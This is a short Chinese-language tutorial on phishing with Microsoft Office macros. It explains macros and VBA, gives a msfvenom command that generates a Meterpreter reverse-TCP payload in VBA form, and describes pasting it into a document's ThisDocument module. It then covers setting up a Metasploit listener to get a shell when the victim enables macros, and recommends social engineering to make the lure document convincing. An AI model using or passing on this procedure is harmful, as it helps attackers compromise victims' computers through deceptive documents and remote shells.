利用Office實現簡單釣魚

Office宏

office宏,譯自英文單詞Macro。宏是微軟公司為其OFFICE軟體包設計的一個特殊功能,軟體設計者為了讓人們在使用軟體進行工作時,避免一再地重複相同的動作而設計出來的一種工具,它利用簡單的語法,把常用的動作寫成宏,當在工作時,就可以直接利用事先編好的宏自動運行,去完成某項特定的任務,而不必再重複相同的動作,目的是讓用戶文檔中的一些任務自動化。

雖然Office宏會給我們的工作帶來便利,但是也埋下了巨大的安全隱患。

先來看一下Office中關於宏的默認設置。

左上角–>文件–>選項

可以看到默認設置為禁用所有宏,並在文件中包含宏的情況下,發出提示。

Office釣魚

Visual Basic for Applications(VBA)是Visual Basic的一種宏語言,是微軟開發出來在其桌面應用程式中執行通用的自動化(OLE)任務的程式語言。主要能用來擴展Windows的應用程式功能,特別是Microsoft Office軟體,也可說是一種應用程式視覺化的Basic 腳本。

首先使用msf生成payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.203.129 lport=4444 -f vba -o shellcode.txt

我們來看一下生成的內容:

我們將程式碼進行粘貼,複製到office宏模板中:

我們首先在開發者工具里,打開Visual Basic

如果Office中沒有開發工具這一選項,那麼請在文件–>選項中進行設置,如下:

回到正軌,我們打開了Visul Basic,找到ThisDocument,並將msf生成的程式碼複製進去保存,如下:

如果出現編譯錯誤的情況,八成是因為shellcode之間多餘的回車符和空行造成的。

現在文件保存好了,我們重新打開:

我們可以看到一個關於宏的警告,只要我們不點啟用,msf是不會上線的。

現在我們在msf中設置好監聽:

開啟監聽並啟用宏:

我們成功拿到了Meterpreter!

由於Office宏隱蔽性差,所以不可單獨使用,這時社會工程學便派上了用場。利用人們思維的定向性,製造一個可欺騙度高的文檔,來誘惑人們點擊,從而使危害擴大化。

VirMach 便宜 VPS

QNews

QNews